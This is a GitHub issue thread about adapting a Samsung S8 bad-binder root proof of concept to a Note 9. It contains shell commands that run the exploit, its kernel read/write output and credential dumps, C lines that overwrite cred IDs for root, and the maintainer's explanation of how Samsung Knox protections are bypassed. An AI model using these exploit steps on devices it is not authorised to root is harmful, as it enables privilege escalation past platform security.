Samsung Note 9 (SM-N9600) poc

magicxor commented 3 years ago

Hi @chompie1337, thank you for such a great work. It's pretty useful to obtain the root privileges without ticking KNOX.

I want to adapt your poc for Samsung Note 9 (SM-N9600) (Android version 8.1.0, Kernel version 4.9.65-14505206 (gcc version 4.9.x 20150123 (prerelease) (GCC)) Tue Jan 8 16:29:04 KST 2019, Android security patch level January 1, 2019, Baseband version N9600ZCU1ARL3, Build Number: N9600ZHU1ASA5) to modify my build.prop.

I'm not very familiar with the Android kernel, so I'm wondering, how did you find DECISION_AVC_CACHE_OFFSET? It seems that I found every offset except for this.

(There is no N9600ZHU1ASA5 version on opensource.samsung.com so I took N9600ZHU1ARL1 from https://github.com/klabit87/twrp_android_kernel_samsung_crownqltechn)

At this point, my phone reboots while s8_poc is running:

crownqltechn:/sdcard/USER/cve $ cp s8_poc /data/local/tmp/s8_poc
crownqltechn:/sdcard/USER/cve $ cd /data/local/tmp
crownqltechn:/data/local/tmp $ chmod +x s8_poc
crownqltechn:/data/local/tmp $ ./s8_poc -s
[+] options are set, we're ready to go :)
[!] attempting to exploit bad binder...
leak_kernel_memory, i = 0
...
usleep(CHILD_SLEEP);
epoll_ctl(iEpFd, EPOLL_CTL_DEL, iBinderFd, &epoll_ev); WITH ARGUMENTS iEpFd=4, EPOLL_CTL_DEL=2, iBinderFd=3, &epoll_ev

I would be glad if you find some time to help.

magicxor commented 3 years ago

The following result I got with https://github.com/magicxor/qu1ckr00t/blob/0ed56c759a6e5877c5ec82c096553e8e4e778104/native/poc.c

CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: Finished write to FIFO.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffc10b75ad00
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
recvmsg() returns 49, expected 49
should have stable kernel R/W now :)
current->mm == 0xffffffc160bf5e40
current->mm->user_ns == 0xffffff800a65eeb8
kernel base is 0xffffff80083bc000
&init_task == 0xffffff800a653380
init_task.cred == 0xffffff80094ec010
init->cred
00000000  04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  ff ff ff ff 3f 00 00 00 ff ff ff ff 3f 00 00 00  |....?.......?...|
00000040  ff ff ff ff 3f 00 00 00 00 00 00 00 00 00 00 00  |....?...........|
00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00 e0 c0 4e 09 80 ff ff ff  |..........N.....|
00000080  48 ee 65 0a 80 ff ff ff b8 ee 65 0a 80 ff ff ff  |H.e.......e.....|
00000090  b8 06 66 0a 80 ff ff ff 00 00 00 00 00 00 00 00  |..f.............|
000000a0  00 00 00 00 00 00 00 00 b0 06 66 0a 80 ff ff ff  |..........f.....|
000000b0  80 33 65 0a 80 ff ff ff 00 00 00 00 00 00 00 00  |.3e.............|
000000c0  00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  |................|
current->cred == 0xffffffc01ffdb500
Starting as uid 2000
current->cred
00000000  01 00 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|
00000010  d0 07 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|
00000020  d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000040  c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000050  00 00 00 00 00 00 00 00 00 77 5b 68 c1 ff ff ff  |.........w[h....|
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00 c0 56 a4 1f c0 ff ff ff  |.........V......|
00000080  00 6e fc d4 c0 ff ff ff b8 ee 65 0a 80 ff ff ff  |.n........e.....|
00000090  00 17 5a 68 c1 ff ff ff 00 00 00 00 00 00 00 00  |..Zh............|
000000a0  00 00 00 00 00 00 00 00 70 93 6b 68 c1 ff ff ff  |........p.kh....|
000000b0  00 ad 75 0b c1 ff ff ff 00 a0 06 20 c0 ff ff ff  |..u........ ....|
000000c0  06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000000  00 02 00 00 00 00 00 00 fe ff ff ff ff ff ff ff  |................|
00000010  00 00 00 00 00 00 00 00 17 12 f0 b3 b4 af da c8  |................|
init->security_cred
00000000  01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 10 c0 4e 09 80 ff ff ff  |..........N.....|
current->security_cred
00000000  92 04 00 00 92 04 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 b5 fd 1f c0 ff ff ff  |................|
Escalating...

Then my phone rebooted. Kernel R/W works:

crownqltechn:/ $ uname -a
Linux localhost 4.9.65-14505206 EXPLOITED KERNEL aarch64

But the phone reboots every time I try to overwrite my IDs:

  // change IDs to root (there are eight)
  for (int i = 0; i < 8; i++)
    kernel_write_uint(my_cred+4 + i*4, 0);

or

  kernel_write_ulong(pSecurityCapableListHead, pSecurityCapableListHead)

chompie1337 commented 3 years ago

Hi, the reason your phone reboots with the quickr00t PoC is because the cred structures are protected with Samsung Knox, so they cant just be simply overwritten. Hence the need for the special bypasses in this PoC. the bad binder exploitation method changes slightly depending on the mod of the offset of wait_head structure (ending in 0x0 or 0x8). At some point, I will release this PoC that is compatible with the S8 exynos. The oreo firmwares for the S8 exynos have the offset that require the other type of bad binder exploitation. If you want, you can simply replace the method for obtaining R/W from quickr00t into this PoC.

chompie1337 / s8_2019_2215_poc

Samsung Note 9 (SM-N9600) poc #2